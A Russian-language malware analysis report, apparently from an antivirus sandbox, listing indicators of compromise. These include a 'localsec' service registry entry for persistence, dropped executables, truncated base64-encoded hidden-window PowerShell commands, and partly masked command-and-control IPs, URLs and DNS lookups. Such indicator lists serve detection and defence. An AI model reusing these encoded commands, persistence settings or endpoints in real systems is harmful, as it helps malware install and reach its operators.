Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\localsec] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\localsec] 'ImagePath' = '"%WINDIR%\SysWOW64\xactengine2_1\localsec.exe"'
- 'localsec' "%WINDIR%\SysWOW64\xactengine2_1\localsec.exe"
- 'localsec' %WINDIR%\SysWOW64\xactengine2_1\localsec.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAHUAagA2AG8AawA3AD0AJwBLAGYAMQBkAGwANwB6ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAdQByAEkAdABZAHAAYABSAG8AVABgAE8AQwBPAEwAIgAgAD0AIAAnAH...
- %TEMP%\jhrx.exe
- %WINDIR%\syswow64\xactengine2_1\localsec.exe
- %TEMP%\jhrx.exe в %WINDIR%\syswow64\xactengine2_1\localsec.exe
- '64.##3.73.122':80
- '69.##.203.214':8080
- '67.##5.85.243':8080
- http://qu####monkey.com/6u1alr/jmu_etfp_04jtkjifle/
- http://xs##ly.com/a/ofq_4p_uxpjw862i/
- http://67.###.85.243:8080/YU76FPRrzd6Rsw/ via 67.##5.85.243
- DNS ASK qu####monkey.com
- DNS ASK qu#####onnection.com
- DNS ASK xs##ly.com
- '%TEMP%\jhrx.exe'
- '%WINDIR%\syswow64\xactengine2_1\localsec.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAHUAagA2AG8AawA3AD0AJwBLAGYAMQBkAGwANwB6ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAdQByAEkAdABZAHAAYABSAG8AVABgAE8AQwBPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)